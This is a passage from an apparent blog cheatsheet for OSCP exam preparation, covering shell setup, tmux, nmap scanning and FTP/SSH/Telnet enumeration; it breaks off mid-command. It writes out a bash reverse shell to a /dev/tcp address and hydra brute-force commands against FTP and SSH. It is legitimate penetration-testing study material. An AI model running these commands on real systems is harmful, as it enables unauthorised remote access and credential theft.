My OSCP Pentesting Cheatsheet

HackerAsk3 pts0 comments

My OSCP Pentesting Cheatsheet | HackerAsk<br>Post<br>Cancel<br>My OSCP Pentesting Cheatsheet<br>Contents My OSCP Pentesting Cheatsheet

I had my OSCP exam on 14.03.2025 and on 17 March, three days later, I already received the confirmation, that I had passed the OSCP exam!<br>This is my compiled and comprehensive list of useful commands that I have documented in my personal knowledge base. In this blog post, I can find useful tips and commands about network and service enumeration, password guessing, reverse shells, Active Directory and Windows post exploitation that can be useful for penetration testing and the OSCP exam.<br>Some useful Tips<br>.env file<br>I created a separate directory for each machine that I hacked during my preparation and the OSCP exam. I then created an .env file in each of these directories and stored useful environment variables such as $TARGET_IP and $TARGET_DOMAIN in them:

export TARGET_IP="10.10.10.11"<br>export TARGET_DOMAIN="hackerask.com"

Then I could simply source the .env file whenever I wanted to work on this machine:

source .env

This is especially useful when you are working with multiple terminal tabs.<br>You can also use this file to store other environment variables that you use frequently, such as credentials or to run scripts, such as starting a terminal logger.<br>$myip environment variable<br>I found it quite useful to have my IP address in a $myip environment variable. Since all the hacking lab platforms I use, such as HackTheBox, Proving Grounds or the challenge labs for my OSCP exam, use OpenVPN to get access to the machines, we can look at the tun0 network interface to see our local VPN IP address. We can look at it with ifconfig tun0 or ip addr show tun0.<br>To avoid having to type in the IP address every time I need it, I created a $myip environment variable that looks like this:

export myip=$(ip addr show tun0 2> /dev/null | grep 'inet ' | awk '{print $2}' | cut -d'/' -f1)

We can add the export line to our .bashrc or .zshrc and then source the file, to be able to use the environment variable:

$ echo -n "/bin/bash -i >& /dev/tcp/$myip/5555 0>&1"

/bin/bash -i >& /dev/tcp/192.168.178.10/5555 0>&1

This will output the reverse shell payload with our IP address of the tun0 network interface.<br>Copy Alias<br>I often have to copy the output of commands from the terminal to document them in my notes. Therefore I created an easy copy alias to pipe the output of an command into the clipboard.<br>I decided to use xclip, which can be installed with apt:

sudo apt install xclip

To create the alias, we can add the following line to the .bashrc or .zshrc file:

alias copy='xclip -selection clipboard'

And then restart the terminal session or source the file to be able to use it.<br>We can use the copy alias, by appending it with a pipe:

echo -n "/bin/bash -i >& /dev/tcp/$myip/5555 0>&1" | copy

This will pipe the output of the echo command, the reverse-shell payload, to our clipboard.<br>Tmux<br>You should definitely learn and use tmux for the OSCP and for doing penetration tests/red team assignments. tmux is an excellent terminal multiplexer that allows you to manage multiple tabs and screens within a single window, making it easy to switch between various tabs with easy keyboard shortcuts.<br>Tmux Cheat Sheet & Quick Reference<br>Network Enumeration<br>General<br>Host Discovery

nmap -sn 192.168.178.1-254 -vv -oA hosts

cat hosts.nmap | grep "report for" | grep -v "down" | cut -f5 -d ' '

If nmap does not work, we can also try to ping the hosts:

for i in $(seq 1 254); do ping "172.16.115.$i" -c 1 -W 0.1|grep "icmp_seq=1"|cut -f4 -d ' '|tr ':' ' '; done

Port Scanning<br>My first step is usually to scan the machine quickly with nmap for open TCP ports:

$ sudo nmap -p- -vvv $TARGET_IP -oN enum/nmap/quick-scan.txt

Then I can use the following command to get all ports comma separated as output:

$ cat enum/nmap/quick-scan.txt | grep '/tcp' | cut -f1 -d '/' | tr '\n' ',' | sed 's/\(.*\),/\1 /'

Then we can use the open ports to do a more detailed version scan:

$ nmap -p -sC -sV -oA enum/nmap/resource $TARGET_IP

After scanning the TCP ports, we should not forget to scan for UDP ports as well:

$ sudo nmap -Pn -n $TARGET_IP -sUV --top-ports=100 --reason -oA enum/nmap/resource-udp

TCP<br>21 - FTP<br>Anonymous Login:

ftp ftp://anonymous:anonymous@$TARGET_IP

Banner grabbing:

nc -vn $TARGET_IP 21

Download all files:

wget -m ftp://anonymous:anonymous@$TARGET_IP<br>wget -r --user="USERNAME" --password="PASSWORD" ftp://$TARGET_IP/

Brutefoce:

hydra -C /usr/share/wordlists/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt $TARGET_IP ftp

22 - SSH<br>Nmap:

# Check Authentication Methods:<br>nmap -p22 $TARGET_IP --script ssh-auth-methods --script-args="ssh.user=root"

# Retrieve Version<br>nmap -p22 $TARGET_IP -sV

Brutefoce:

hydra -C /usr/share/wordlists/seclists/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt $TARGET_IP ssh

23 - Telnet<br>Banner Grabbing:

nc -vn $TARGET_IP 23

Nmap Enumeration:

nmap -n -sV -Pn --script...

nmap target_ip oscp useful file environment

Related Articles